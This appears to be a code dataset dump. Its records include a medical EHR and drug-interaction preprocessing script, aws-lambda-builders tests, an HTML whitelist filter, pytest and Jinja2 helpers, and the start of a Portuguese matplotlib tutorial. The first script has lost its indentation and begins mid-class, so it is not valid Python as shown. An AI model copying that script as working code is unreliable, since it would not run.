# given a sequence of medical concepts, obtain their ids and store the mapping
def add_concepts(self, concepts):
for item in concepts:
if item not in self.concept2id.keys():
# self.id2concept[len(self.concept2id)] = item
self.concept2id[item] = len(self.concept2id)
self.id2concept[self.concept2id.get(item)] = item
def get_concept_count(self):
return len(self.concept2id)
def map_concepts2id():
concept2id_prescriptions = Concept2Id()
concept2id_diagnoses = Concept2Id()
concept2id_procedures = Concept2Id()
patient_records = dill.load(open(PATIENT_RECORDS_FILE, 'rb'))
for patient in patient_records:
for adm in patient:
medications, diagnoses, procedures = adm[0], adm[1], adm[2]
concept2id_prescriptions.add_concepts(medications)
concept2id_diagnoses.add_concepts(diagnoses)
concept2id_procedures.add_concepts(procedures)
dill.dump({'concept2id_prescriptions': concept2id_prescriptions, 'concept2id_diagnoses': concept2id_diagnoses,
'concept2id_procedures': concept2id_procedures}, open(CONCEPTID_FILE, 'wb'))
def build_ddi_matrix():
topN = 100
drug_ddi_df = pd.read_csv(drug_ddi_file)
ddi_most_pd = drug_ddi_df.groupby(by=['Polypharmacy Side Effect', 'Side Effect Name']).size().reset_index().rename(
columns={0: 'count'}).sort_values(by=['count'], ascending=False).reset_index(drop=True)
ddi_most_pd = ddi_most_pd.iloc[-topN:, :]
fliter_ddi_df = drug_ddi_df.merge(ddi_most_pd[['Side Effect Name']], how='inner', on=['Side Effect Name'])
ddi_df = fliter_ddi_df[['STITCH 1', 'STITCH 2']].drop_duplicates().reset_index(drop=True)
concept2id_prescriptions = dill.load(open(CONCEPTID_FILE, 'rb')).get('concept2id_prescriptions')
stitch2atc_dict = {}
with open(drug_stitch2atc_file, 'r') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for line in reader:
stitch_id = line[0]
atc_set = line[1:]
stitch2atc_dict[stitch_id] = atc_set
prescriptions_size = concept2id_prescriptions.get_concept_count()
ddi_matrix = np.zeros((prescriptions_size, prescriptions_size))
for index, row in ddi_df.iterrows():
stitch_id1 = row['STITCH 1']
stitch_id2 = row['STITCH 2']
if stitch_id1 in stitch2atc_dict.keys() and stitch_id2 in stitch2atc_dict.keys():
for atc_i in stitch2atc_dict[stitch_id1]:
for atc_j in stitch2atc_dict[stitch_id2]:
atc_i = atc_i[:4]
atc_j = atc_j[:4]
if atc_i in concept2id_prescriptions.concept2id.keys() and atc_j in concept2id_prescriptions.concept2id.keys() and atc_i != atc_j:
ddi_matrix[
concept2id_prescriptions.concept2id.get(atc_i), concept2id_prescriptions.concept2id.get(
atc_j)] = 1
ddi_matrix[
concept2id_prescriptions.concept2id.get(atc_j), concept2id_prescriptions.concept2id.get(
atc_i)] = 1
dill.dump({'ddi_matrix': ddi_matrix}, open(DDI_MATRIX_FILE, 'wb'))
def build_patient_records():
ddi_matrix = dill.load(open(DDI_MATRIX_FILE, 'rb'))['ddi_matrix']
def get_ddi_rate(medications):
med_pair_count = 0.0
ddi_count = 0.0
ddi_rate = 0
for med_i, med_j in combinations(medications, 2):
med_pair_count += 1
if ddi_matrix[med_i][med_j] == 1:
ddi_count += 1
if med_pair_count != 0:
ddi_rate = ddi_count / med_pair_count
return ddi_rate
concept2id_object = dill.load(open(CONCEPTID_FILE, 'rb'))
concept2id_prescriptions = concept2id_object.get('concept2id_prescriptions')
concept2id_diagnoses = concept2id_object.get('concept2id_diagnoses')
concept2id_procedures = concept2id_object.get('concept2id_procedures')
patient_records_idx = []
patient_records = dill.load(open(PATIENT_RECORDS_FILE, 'rb'))
for patient in patient_records:
current_patient = []
for adm in patient:
medications, diagnoses, procedures = adm[0], adm[1], adm[2]
admission = []
admission.append([concept2id_prescriptions.concept2id.get(item) for item in medications])
admission.append([concept2id_diagnoses.concept2id.get(item) for item in diagnoses])
admission.append([concept2id_procedures.concept2id.get(item) for item in procedures])
ddi_rate = get_ddi_rate(admission[0])
admission.append([ddi_rate])
current_patient.append(admission)
patient_records_idx.append(current_patient)
dill.dump({'patient_records': patient_records_idx}, open(PATIENT_RECORDS_FINAL_FILE, 'wb'))
def data_sampling():
ddi_rate_bins = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]
patient_records_split_by_ddi_rate = {}
for ddi_rate in ddi_rate_bins:
patient_records_split_by_ddi_rate[ddi_rate] = []
patient_records = dill.load(open(PATIENT_RECORDS_FINAL_FILE, 'rb'))['patient_records']
for patient in patient_records:
for idx, admission in enumerate(patient):
ddi_rate = admission[3][0]
current_patient_record = patient[:idx + 1]
patient_records_split_by_ddi_rate[math.ceil(ddi_rate * 10.0) / 10].append(current_patient_record)
train, test, validation = {}, {}, {}
for ddi_rate, patients in patient_records_split_by_ddi_rate.items():
train_patients, test_patients = train_test_split(patients, test_size=0.1)
train_patients, validation_patients = train_test_split(train_patients, test_size=0.1)
train[ddi_rate], test[ddi_rate], validation[ddi_rate] = train_patients, test_patients, validation_patients
dill.dump({'train': train, 'test': test, 'validation': validation}, open(PATIENT_RECORDS_FILE_SEPARATE, 'wb'))
print('patient records information stored separately by ddi rate')
print('training dataset:')
for key, value in train.items():
print(key, len(value), end=';')
print()
print('test dataset')
for key, value in test.items():
print(key, len(value), end=';')
print()
print('validation dataset')
for key, value in validation.items():
print(key, len(value), end=';')
print()
for ddi_rate in ddi_rate_bins[1:]:
train[ddi_rate] = train[ddi_rate] + train[round(ddi_rate - 0.1, 1)]
test[ddi_rate] = test[ddi_rate] + test[round(ddi_rate - 0.1, 1)]
validation[ddi_rate] = validation[ddi_rate] + validation[round(ddi_rate - 0.1, 1)]
dill.dump({'train': train, 'test': test, 'validation': validation}, open(PATIENT_RECORDS_FILE_ACCUMULATE, 'wb'))
print('patient records information stored accumulately by ddi rate')
print('training dataset:')
for key, value in train.items():
print(key, len(value), end=';')
print()
print('test dataset')
for key, value in test.items():
print(key, len(value), end=';')
print()
print('validation dataset')
for key, value in validation.items():
print(key, len(value), end=';')
print()
def build_co_occurrence_matrix():
patient_ddi_rate = 1.0
concept2id_object = dill.load(open(CONCEPTID_FILE, 'rb'))
concept2id_medication = concept2id_object.get('concept2id_prescriptions')
medication_count = concept2id_medication.get_concept_count()
matrix = np.zeros((medication_count, medication_count))
patient_records = dill.load(open(PATIENT_RECORDS_FILE_ACCUMULATE, 'rb'))['train'][1.0]
count = 0
for patient in patient_records:
for admission in patient:
if admission[-1][0] <= patient_ddi_rate:
medications = admission[0]
for med_i, med_j in combinations(medications, 2):
count += 1
matrix[med_i][med_j] = 1
matrix[med_j][med_i] = 1
dill.dump(matrix, open(EHR_MATRIX_FILE, 'wb'))
unique, counts = np.unique(matrix, return_counts=True)
print(dict(zip(unique, counts)))
if __name__ == '__main__':
process_ehr()
map_concepts2id()
build_ddi_matrix()
build_patient_records()
data_sampling()
build_co_occurrence_matrix()
| 15,128 | 4 | 401 |
1df2694a3bb7653200bc5f5e27eae8c5e5f858e0 | 5,223 | py | Python | tests/unit/workflows/dotnet_clipackage/test_actions.py | wchengru/aws-lambda-builders | 0f2abdcb3a83ab46440abd6a6c4350ce67fd1f7a | [
"Apache-2.0"
] | 1 | 2021-07-10T14:34:20.000Z | 2021-07-10T14:34:20.000Z | tests/unit/workflows/dotnet_clipackage/test_actions.py | wchengru/aws-lambda-builders | 0f2abdcb3a83ab46440abd6a6c4350ce67fd1f7a | [
"Apache-2.0"
] | null | null | null | tests/unit/workflows/dotnet_clipackage/test_actions.py | wchengru/aws-lambda-builders | 0f2abdcb3a83ab46440abd6a6c4350ce67fd1f7a | [
"Apache-2.0"
] | null | null | null | from unittest import TestCase
from concurrent.futures import ThreadPoolExecutor
from mock import patch
import os
import platform
from aws_lambda_builders.actions import ActionFailedError
from aws_lambda_builders.workflows.dotnet_clipackage.dotnetcli import DotnetCLIExecutionError
from aws_lambda_builders.workflows.dotnet_clipackage.actions import GlobalToolInstallAction, RunPackageAction
@patch.object(GlobalToolInstallAction, "_GlobalToolInstallAction__tools_installed", False)
| 38.404412 | 117 | 0.684664 | from unittest import TestCase
from concurrent.futures import ThreadPoolExecutor
from mock import patch
import os
import platform
from aws_lambda_builders.actions import ActionFailedError
from aws_lambda_builders.workflows.dotnet_clipackage.dotnetcli import DotnetCLIExecutionError
from aws_lambda_builders.workflows.dotnet_clipackage.actions import GlobalToolInstallAction, RunPackageAction
@patch.object(GlobalToolInstallAction, "_GlobalToolInstallAction__tools_installed", False)
class TestGlobalToolInstallAction(TestCase):
@patch("aws_lambda_builders.workflows.dotnet_clipackage.dotnetcli.SubprocessDotnetCLI")
def setUp(self, MockSubprocessDotnetCLI):
self.subprocess_dotnet = MockSubprocessDotnetCLI.return_value
def tearDown(self):
self.subprocess_dotnet.reset_mock()
def test_global_tool_install(self):
action = GlobalToolInstallAction(self.subprocess_dotnet)
action.execute()
self.subprocess_dotnet.run.assert_called_once_with(
["tool", "install", "-g", "Amazon.Lambda.Tools", "--ignore-failed-sources"]
)
def test_global_tool_update(self):
self.subprocess_dotnet.run.side_effect = [DotnetCLIExecutionError(message="Already Installed"), None]
action = GlobalToolInstallAction(self.subprocess_dotnet)
action.execute()
self.subprocess_dotnet.run.assert_any_call(
["tool", "install", "-g", "Amazon.Lambda.Tools", "--ignore-failed-sources"]
)
self.subprocess_dotnet.run.assert_any_call(
["tool", "update", "-g", "Amazon.Lambda.Tools", "--ignore-failed-sources"]
)
def test_global_tool_update_failed(self):
self.subprocess_dotnet.run.side_effect = [
DotnetCLIExecutionError(message="Already Installed"),
DotnetCLIExecutionError(message="Updated Failed"),
]
action = GlobalToolInstallAction(self.subprocess_dotnet)
self.assertRaises(ActionFailedError, action.execute)
def test_global_tool_parallel(self):
actions = [
GlobalToolInstallAction(self.subprocess_dotnet),
GlobalToolInstallAction(self.subprocess_dotnet),
GlobalToolInstallAction(self.subprocess_dotnet),
]
with ThreadPoolExecutor() as executor:
for action in actions:
executor.submit(action.execute)
self.subprocess_dotnet.run.assert_called_once_with(
["tool", "install", "-g", "Amazon.Lambda.Tools", "--ignore-failed-sources"]
)
class TestRunPackageAction(TestCase):
@patch("aws_lambda_builders.workflows.dotnet_clipackage.dotnetcli.SubprocessDotnetCLI")
@patch("aws_lambda_builders.workflows.dotnet_clipackage.utils.OSUtils")
def setUp(self, MockSubprocessDotnetCLI, MockOSUtils):
self.subprocess_dotnet = MockSubprocessDotnetCLI.return_value
self.os_utils = MockOSUtils
self.source_dir = os.path.join("/source_dir")
self.artifacts_dir = os.path.join("/artifacts_dir")
self.scratch_dir = os.path.join("/scratch_dir")
def tearDown(self):
self.subprocess_dotnet.reset_mock()
def test_build_package(self):
mode = "Release"
options = {}
action = RunPackageAction(
self.source_dir, self.subprocess_dotnet, self.artifacts_dir, options, mode, self.os_utils
)
action.execute()
zipFilePath = os.path.join("/", "artifacts_dir", "source_dir.zip")
self.subprocess_dotnet.run.assert_called_once_with(
["lambda", "package", "--output-package", zipFilePath], cwd="/source_dir"
)
def test_build_package_arguments(self):
mode = "Release"
options = {"--framework": "netcoreapp2.1"}
action = RunPackageAction(
self.source_dir, self.subprocess_dotnet, self.artifacts_dir, options, mode, self.os_utils
)
action.execute()
if platform.system().lower() == "windows":
zipFilePath = "/artifacts_dir\\source_dir.zip"
else:
zipFilePath = "/artifacts_dir/source_dir.zip"
self.subprocess_dotnet.run.assert_called_once_with(
["lambda", "package", "--output-package", zipFilePath, "--framework", "netcoreapp2.1"], cwd="/source_dir"
)
def test_build_error(self):
mode = "Release"
self.subprocess_dotnet.run.side_effect = DotnetCLIExecutionError(message="Failed Package")
options = {}
action = RunPackageAction(
self.source_dir, self.subprocess_dotnet, self.artifacts_dir, options, mode, self.os_utils
)
self.assertRaises(ActionFailedError, action.execute)
def test_debug_configuration_set(self):
mode = "Debug"
options = None
action = RunPackageAction(
self.source_dir, self.subprocess_dotnet, self.artifacts_dir, options, mode, self.os_utils
)
zipFilePath = os.path.join("/", "artifacts_dir", "source_dir.zip")
action.execute()
self.subprocess_dotnet.run.assert_called_once_with(
["lambda", "package", "--output-package", zipFilePath, "--configuration", "Debug"], cwd="/source_dir"
)
| 4,070 | 621 | 45 |
77628e4e80f121e07de23f836240620bb990306b | 3,783 | py | Python | htmlfilter/__init__.py | samueladam/htmlfilter | 32c9a3ac50214e20bc4f8b85e9e8e5fcd137ff3f | [
"BSD-3-Clause"
] | null | null | null | htmlfilter/__init__.py | samueladam/htmlfilter | 32c9a3ac50214e20bc4f8b85e9e8e5fcd137ff3f | [
"BSD-3-Clause"
] | 1 | 2021-04-29T14:29:39.000Z | 2021-04-29T14:29:39.000Z | htmlfilter/__init__.py | samueladam/htmlfilter | 32c9a3ac50214e20bc4f8b85e9e8e5fcd137ff3f | [
"BSD-3-Clause"
] | null | null | null | import re
from collections import defaultdict
import rules
attrs_re = re.compile(r"""\s*(\w+)\s*=\s*(["'])(.*?)(?<!\\)\2""", re.DOTALL)
class HTMLFilter:
"""Simple HTML white list filter.
Usage:
hf = HTMLFilter()
filtered_html = hf.filter(html)
The filter parses the code for < and > characters.
It tries to correct malformed tags and close them.
Use it with a WYSIWYG editor on the client side
to convert user's < and > inputs into < and >
For the tough stuff, prefer BeautifulSoup.
"""
| 32.059322 | 84 | 0.486651 | import re
from collections import defaultdict
import rules
attrs_re = re.compile(r"""\s*(\w+)\s*=\s*(["'])(.*?)(?<!\\)\2""", re.DOTALL)
class HTMLFilter:
"""Simple HTML white list filter.
Usage:
hf = HTMLFilter()
filtered_html = hf.filter(html)
The filter parses the code for < and > characters.
It tries to correct malformed tags and close them.
Use it with a WYSIWYG editor on the client side
to convert user's < and > inputs into < and >
For the tough stuff, prefer BeautifulSoup.
"""
def __init__(self, rules=rules):
# default config
self.rules = rules
# other tags and attributes are removed
self.allowed = hasattr(rules, 'TAGS') and rules.TAGS or {}
# <tag />
self.non_closing = hasattr(rules, 'NON_CLOSING') and rules.NON_CLOSING or []
# <blockquote><blockquote></blockquote></blockquote>
self.overlapping = hasattr(rules, 'OVERLAPPING') and rules.OVERLAPPING or []
def filter(self, data):
# reset
self.filtered_data = filtered_data = []
self.open_tags = open_tags = defaultdict(int)
handle_data = self.handle_data
chunks = data.split('<')
filtered_data.append(chunks.pop(0))
for chunk in chunks:
handle_data(chunk)
# close open tags
for tag, times in open_tags.iteritems():
for i in xrange(times):
filtered_data.extend(['</', tag, '>'])
return ''.join(self.filtered_data)
def handle_data(self, chunk):
if chunk:
if '>' in chunk:
tagdata, text = chunk.split('>', 1)
else:
# the tag didn't end
tagdata, text = chunk, ''
self.handle_tag(tagdata)
self.filtered_data.append(text)
def handle_tag(self, tagdata):
attrs = tagdata.strip().split(' ', 1)
tag = attrs.pop(0).lower()
if tag:
if tag[0] == '/':
self.handle_endtag(tag[1:])
else:
if attrs:
# find the attributes
attrs = [(a[0], a[2]) for a in attrs_re.findall(attrs[0])]
self.handle_starttag(tag, attrs)
def handle_starttag(self, tag, attrs):
if tag in self.allowed:
# open tags check
if tag in self.non_closing:
tag_tail = ' /'
else:
if tag not in self.overlapping and self.open_tags[tag] > 0:
self.handle_endtag(tag)
self.open_tags[tag] += 1
tag_tail = ''
# filter attributes
filtered_attrs = {}
for attr, val in attrs:
if attr in self.allowed[tag]:
filterfn = "%s_%s" % (tag, attr)
if hasattr(self.rules, filterfn):
val = getattr(self.rules, filterfn)(val)
if val:
filtered_attrs[attr] = val
self.filtered_data.extend(
['<',
tag,
filtered_attrs and ' ' or '',
' '.join(['%s="%s"' % (k, v)
for (k, v)
in filtered_attrs.iteritems()]),
tag_tail,
'>'
])
def handle_endtag(self, tag):
if tag in self.allowed and self.open_tags[tag] > 0 \
and tag not in self.non_closing:
self.filtered_data.extend(['</', tag, '>'])
self.open_tags[tag] -= 1
| 3,070 | 0 | 162 |
c07709071c9f9eaa1f7eed96069e6eb047c7e7ba | 1,280 | py | Python | tools/funcutils.py | dineshjoshi/cassandra-dtest-1 | 18ccbb4d308c27b67a8d81a2c849dc27fc3e2b5c | [
"Apache-2.0"
] | 52 | 2015-02-13T15:49:03.000Z | 2020-11-15T10:59:20.000Z | tools/funcutils.py | dineshjoshi/cassandra-dtest-1 | 18ccbb4d308c27b67a8d81a2c849dc27fc3e2b5c | [
"Apache-2.0"
] | 1,232 | 2015-01-05T19:31:26.000Z | 2020-06-07T02:59:43.000Z | tools/funcutils.py | dineshjoshi/cassandra-dtest-1 | 18ccbb4d308c27b67a8d81a2c849dc27fc3e2b5c | [
"Apache-2.0"
] | 105 | 2017-07-13T14:28:14.000Z | 2022-03-23T04:22:46.000Z | import time
class get_rate_limited_function(object):
"""
Close over a function and a time limit in seconds. The resulting object can
be called like the function, but will not delegate to the function if that
function was called through the object in the time limit.
Clients can ignore the time limit by calling the function directly as the
func attribute of the object.
"""
def merge_dicts(*dict_args):
"""
Given any number of dicts, shallow copy and merge into a new dict,
precedence goes to key value pairs in latter dicts.
"""
result = {}
for dictionary in dict_args:
result.update(dictionary)
return result
| 31.219512 | 90 | 0.645313 | import time
class get_rate_limited_function(object):
"""
Close over a function and a time limit in seconds. The resulting object can
be called like the function, but will not delegate to the function if that
function was called through the object in the time limit.
Clients can ignore the time limit by calling the function directly as the
func attribute of the object.
"""
def __init__(self, func, limit):
self.func, self.limit = func, limit
self.last_called = False
def __call__(self, *args, **kwargs):
elapsed = time.time() - self.last_called
if elapsed >= self.limit:
self.last_called = time.time()
return self.func(*args, **kwargs)
def __repr__(self):
return '{cls_name}(func={func}, limit={limit}, last_called={last_called})'.format(
cls_name=self.__class__.__name__,
func=self.func,
limit=self.limit,
last_called=self.last_called,
)
def merge_dicts(*dict_args):
"""
Given any number of dicts, shallow copy and merge into a new dict,
precedence goes to key value pairs in latter dicts.
"""
result = {}
for dictionary in dict_args:
result.update(dictionary)
return result
| 520 | 0 | 80 |
2ad4743e108cbde934ef319c28fa3ec378322843 | 780 | py | Python | jinja2_ospath/extensions.py | Midnighter/jinja2-ospath | 624aee8f552dd38d1eea97289e3ab194b105d843 | [
"BSD-3-Clause"
] | 6 | 2017-04-05T02:41:52.000Z | 2020-10-25T19:42:24.000Z | jinja2_ospath/extensions.py | Midnighter/jinja2-ospath | 624aee8f552dd38d1eea97289e3ab194b105d843 | [
"BSD-3-Clause"
] | null | null | null | jinja2_ospath/extensions.py | Midnighter/jinja2-ospath | 624aee8f552dd38d1eea97289e3ab194b105d843 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Extensions that introduce `basename` and `dirname` as Jinja2 filters.
Examples
--------
my_path = "/some/absolute/path/with/file.txt"
{{ my_path | basename }}
Will fill in `file.txt`.
"""
from __future__ import absolute_import
import os.path
from jinja2.ext import Extension
__all__ = ("OSPathExtension",)
class OSPathExtension(Extension):
"""A Jinja2 extension that introduces `os.path` functionality."""
tags = frozenset(["basename", "dirname", "abspath"])
def __init__(self, environment):
"""Initialize the extension and prepare the Jinja2 environment."""
super(OSPathExtension, self).__init__(environment)
for name in self.tags:
environment.filters[name] = getattr(os.path, name)
| 22.941176 | 74 | 0.675641 | # -*- coding: utf-8 -*-
"""
Extensions that introduce `basename` and `dirname` as Jinja2 filters.
Examples
--------
my_path = "/some/absolute/path/with/file.txt"
{{ my_path | basename }}
Will fill in `file.txt`.
"""
from __future__ import absolute_import
import os.path
from jinja2.ext import Extension
__all__ = ("OSPathExtension",)
class OSPathExtension(Extension):
"""A Jinja2 extension that introduces `os.path` functionality."""
tags = frozenset(["basename", "dirname", "abspath"])
def __init__(self, environment):
"""Initialize the extension and prepare the Jinja2 environment."""
super(OSPathExtension, self).__init__(environment)
for name in self.tags:
environment.filters[name] = getattr(os.path, name)
| 0 | 0 | 0 |
3f7a9a00e6eb0b0cea9311cfb15837a64aaa0513 | 4,190 | py | Python | pytest_pdb.py | fschulze/pytest-pdb | 88bb88a20c6e69ec4e3da4a2d6cabac9cfb2cd86 | [
"MIT"
] | 9 | 2016-07-09T12:22:57.000Z | 2019-11-11T17:50:38.000Z | pytest_pdb.py | fschulze/pytest-pdb | 88bb88a20c6e69ec4e3da4a2d6cabac9cfb2cd86 | [
"MIT"
] | 9 | 2016-08-23T18:38:28.000Z | 2019-10-21T07:14:27.000Z | pytest_pdb.py | fschulze/pytest-pdb | 88bb88a20c6e69ec4e3da4a2d6cabac9cfb2cd86 | [
"MIT"
] | 1 | 2017-01-16T17:55:52.000Z | 2017-01-16T17:55:52.000Z | from __future__ import print_function
import pdb
import pytest
import sys
| 28.120805 | 74 | 0.583055 | from __future__ import print_function
import pdb
import pytest
import sys
def find_test_by_frame(currentframe):
frame = currentframe
prev = frame
while frame:
for value in frame.f_locals.values():
if isinstance(value, pytest.Item):
return (value, prev)
prev = frame
frame = frame.f_back
return (None, currentframe)
def find_test_by_stack(stack):
for index, (frame, lineno) in reversed(list(enumerate(stack))):
for value in frame.f_locals.values():
if isinstance(value, pytest.Item):
return (value, stack[index + 1][0], index + 1)
return (None, stack[0], 0)
def find_settrace_frame(curframe):
frame = curframe
while frame:
if frame.f_code.co_name == 'set_trace':
if frame.f_back:
return frame.f_back
frame = frame.f_back
def offset_between_frames(currentframe, destinationframe):
# search from current
index = 0
frame = currentframe
while frame:
if frame == destinationframe:
return index
index -= 1
frame = frame.f_back
# search from destination
index = 0
frame = destinationframe
while frame:
if frame == currentframe:
return index
index += 1
frame = frame.f_back
def offset_description(offset):
if offset == 0:
return 'at current frame'
elif offset == 1:
return '1 frame above'
elif offset > 1:
return '%s frames above' % offset
elif offset == -1:
return '1 frame below'
else:
return '%s frames below' % -offset
class PdbExtension:
def do_whichtest(self, arg):
"""whichtest | wt
Show which test we are currently in.
"""
(test, frame, index) = find_test_by_stack(self.stack)
if test is None:
print("Couldn't determine current test", file=self.stdout)
return
offset = index - self.curindex
print("Currently in {} ({}:{}) on line {} ({})".format(
test.location[2], test.location[0], test.location[1] + 1,
frame.f_lineno, offset_description(offset)), file=self.stdout)
do_wt = do_whichtest
def do_gototest(self, arg):
"""gototest | gt
Go to frame containing the current test.
"""
(test, frame, index) = find_test_by_stack(self.stack)
if test is None:
print("Couldn't determine current test.", file=self.stdout)
return
self._select_frame(index)
do_gt = do_gototest
def do_top(self, arg):
"""top
Move to top (oldest) frame.
"""
if self.curindex == 0:
self.error('Oldest frame')
return
self._select_frame(0)
def do_bottom(self, arg):
"""bottom
Move to bottom (newest) frame.
"""
if self.curindex + 1 == len(self.stack):
self.error('Newest frame')
return
self._select_frame(len(self.stack) - 1)
def pytest_configure(config):
cmds = {x[3:] for x in dir(PdbExtension) if x.startswith('do_')}
prefixes = {'do', 'help'}
for prefix in prefixes:
for cmd in cmds:
attr = '%s_%s' % (prefix, cmd)
if hasattr(pdb.Pdb, attr):
raise ValueError
for prefix in prefixes:
for cmd in cmds:
attr = '%s_%s' % (prefix, cmd)
if hasattr(PdbExtension, attr):
setattr(pdb.Pdb, attr, getattr(PdbExtension, attr))
def pytest_enter_pdb(config):
import _pytest.config
tw = _pytest.config.create_terminal_writer(config)
curframe = sys._getframe().f_back
(test, frame) = find_test_by_frame(curframe)
if test is None:
tw.sep(">", "Couldn't determine current test")
return
offset = offset_between_frames(find_settrace_frame(curframe), frame)
desc = ''
if offset is not None:
desc = ' (%s)' % offset_description(offset)
tw.sep(">", "Currently in {} ({}:{}) on line {}{}".format(
test.location[2], test.location[0], test.location[1] + 1,
frame.f_lineno, desc))
| 2,537 | 1,387 | 184 |
90202dc319205aa9dfe44731814dba7ab2969a14 | 517 | py | Python | pct_python_default_test/pct_python_default_test.py | bitranox/pct_python_default_test | 1220b36c2fbc345fcabc43f0b9934db8415f682c | [
"MIT"
] | null | null | null | pct_python_default_test/pct_python_default_test.py | bitranox/pct_python_default_test | 1220b36c2fbc345fcabc43f0b9934db8415f682c | [
"MIT"
] | 1 | 2020-07-16T21:52:39.000Z | 2020-07-16T21:52:39.000Z | pct_python_default_test/pct_python_default_test.py | bitranox/pct_python_default_test | 1220b36c2fbc345fcabc43f0b9934db8415f682c | [
"MIT"
] | null | null | null | # STDLIB
import sys
# main{{{
def main() -> None:
"""
the main method, prints hello world
Parameter
----------
none
none
Result
----------
none
Exceptions
----------
none
Examples
----------
>>> main()
Hello World - by PizzaCutter
"""
# main}}}
print("Hello World - by PizzaCutter")
if __name__ == "__main__":
print(b'this is a library only, the executable is named "pct_python_default_test_cli.py"', file=sys.stderr)
| 12.609756 | 111 | 0.524178 | # STDLIB
import sys
# main{{{
def main() -> None:
"""
the main method, prints hello world
Parameter
----------
none
none
Result
----------
none
Exceptions
----------
none
Examples
----------
>>> main()
Hello World - by PizzaCutter
"""
# main}}}
print("Hello World - by PizzaCutter")
if __name__ == "__main__":
print(b'this is a library only, the executable is named "pct_python_default_test_cli.py"', file=sys.stderr)
| 0 | 0 | 0 |
0bb859a0f09642ca495e7ada8a843bbeabd7c425 | 1,354 | py | Python | receiver/f12021/packets/base.py | f1laps/f1laps-telemetry | 0c264f9300d58397fe2f8b3018cd2e9151e28d08 | [
"MIT"
] | 3 | 2021-02-23T22:06:13.000Z | 2022-02-06T15:05:56.000Z | receiver/f12021/packets/base.py | f1laps/f1laps-telemetry | 0c264f9300d58397fe2f8b3018cd2e9151e28d08 | [
"MIT"
] | null | null | null | receiver/f12021/packets/base.py | f1laps/f1laps-telemetry | 0c264f9300d58397fe2f8b3018cd2e9151e28d08 | [
"MIT"
] | null | null | null | import ctypes
from lib.logger import log
from receiver.game_version import CrossGamePacketHeader
class PacketHeader(CrossGamePacketHeader):
"""
The Packet Header is the same across F12020 and F12021
Hence we use one shared HeaderClass for now
May have to upgrade that logic if it changes
"""
pass | 32.238095 | 113 | 0.585672 | import ctypes
from lib.logger import log
from receiver.game_version import CrossGamePacketHeader
class PacketBase(ctypes.LittleEndianStructure):
_pack_ = 1
creates_session_object = False
def process(self, session):
log.debug("Skipping incoming %s because it doesn't have a '.process()' method" % self.__class__.__name__)
return session
def __repr__(self):
""" Custom repr method """
fstr_list = []
for field in self._fields_:
fname = field[0]
value = getattr(self, fname)
if isinstance(
value, (ctypes.LittleEndianStructure, int, float, bytes)
):
vstr = repr(value)
elif isinstance(value, ctypes.Array):
vstr = "[{}]".format(", ".join(repr(e) for e in value))
else:
raise RuntimeError(
"Bad value {!r} of type {!r}".format(value, type(value))
)
fstr = f"{fname}={vstr}"
fstr_list.append(fstr)
return "{}({})".format(self.__class__.__name__, ", ".join(fstr_list))
class PacketHeader(CrossGamePacketHeader):
"""
The Packet Header is the same across F12020 and F12021
Hence we use one shared HeaderClass for now
May have to upgrade that logic if it changes
"""
pass | 143 | 863 | 23 |
b9598b4ab45217317e00c390d5206308d71afa14 | 18,121 | py | Python | _build/jupyter_execute/ipynb/04b-plotagem-matplotlib.py | gcpeixoto/FMECD | 9bca72574c6630d1594396fffef31cfb8d58dec2 | [
"CC0-1.0"
] | null | null | null | _build/jupyter_execute/ipynb/04b-plotagem-matplotlib.py | gcpeixoto/FMECD | 9bca72574c6630d1594396fffef31cfb8d58dec2 | [
"CC0-1.0"
] | null | null | null | _build/jupyter_execute/ipynb/04b-plotagem-matplotlib.py | gcpeixoto/FMECD | 9bca72574c6630d1594396fffef31cfb8d58dec2 | [
"CC0-1.0"
] | null | null | null | # Plotagem básica com _matplotlib_
## Visualização de dados
A visualização de dados é um campo do conhecimento bastante antigo que foi trazido à mostra muito recentemente com a expansão do "Big Data". Seu principal objetivo é representar dados e informações graficamente por meio de elementos visuais como tabelas, gráficos, mapas e infográficos. Diversas ferramentas estão disponíveis para tornar a interpretação de dados mais clara, compreensível e acessível.
No contexto da análise de dados, a visualização de dados é um componente fundamental para a criação de relatórios de negócios, painéis de instrumentos (_dashboards_) e gráficos multidimensionais que são aplicáveis às mais diversas disciplinas, tais como Economia, Ciência Política e, principalmente, todo o núcleo de ciências exatas (Matemática, Estatística e Computação).
Em seu livro _The Visual Display of Quantitative Information_, [[Edward Tufte]](https://www.edwardtufte.com/tufte/), conhecido como o guru do _design_ aplicado à visualização de dados, afirma que, a cada ano, o mundo produz algo entre 900 bilhões e 2 trilhões de imagens impressas de gráficos. Ele destaca que o _design_ de um gráfico estatístico, por exemplo, é uma matéria universal similar à Matemática e não está atrelado a características únicas de uma linguagem particular. Portanto, aprender visualização de dados para comunicar dados com eficiência é tão importante quanto aprender a Língua Portuguesa para escrever melhor.
Você pode ver uma lista sugestiva de bons blogues e livros sobre visualização de dados nas páginas de aprendizagem do software Tableau [[TabelauBlogs]](https://www.tableau.com/learn/articles/best-data-visualization-blogs), [[TabelauBooks]](https://www.tableau.com/learn/articles/books-about-data-visualization).
## _Data storytelling_
_Data Storytelling_ é o processo de "contar histórias através dos dados". [[Cole Knaflic]](http://www.storytellingwithdata.com), uma engenheira de dados do Google, ao perceber como a quantidade de informação produzida no mundo às vezes é muito mal lida e comunicada, escreveu dois *best-sellers* sobre este tema a fim de ajudar pessoas a comunicarem melhor seus dados e produtos quantitativos. Ela argumenta em seu livro *Storytelling with Data: A Data Visualization Guide for Business Professionals* (*Storytelling com Dados: um Guia Sobre Visualização de Dados Para Profissionais de Negócios*, na versão em português) que não somos inerentemente bons para "contar uma história" através dos dados. Cole mostra com poucas lições o que devemos aprender para atingir uma comunicação eficiente por meio da visualização de dados.
## Plotagem matemática
_Plotagem_ é o termo comumente empregado para o esboço de gráficos de funções matemáticas via computador. Plotar gráficos é uma das tarefas que você mais realizará como futuro(a) cientista ou analista de dados. Nesta aula, nós introduziremos você ao universo da plotagem de gráficos em duas dimensões e ensinar como você pode visualizar dados facilmente com a biblioteca *matplotlib*. Daremos uma visão geral principalmente sobre a plotagem de funções matemáticas utilizando *arrays* e recursos de computação vetorizada com *numpy* já aprendidos. Ao longo do curso, você aprenderá a fazer plotagens mais interessantes de cunho estatístico.
## A biblioteca *matplotlib*
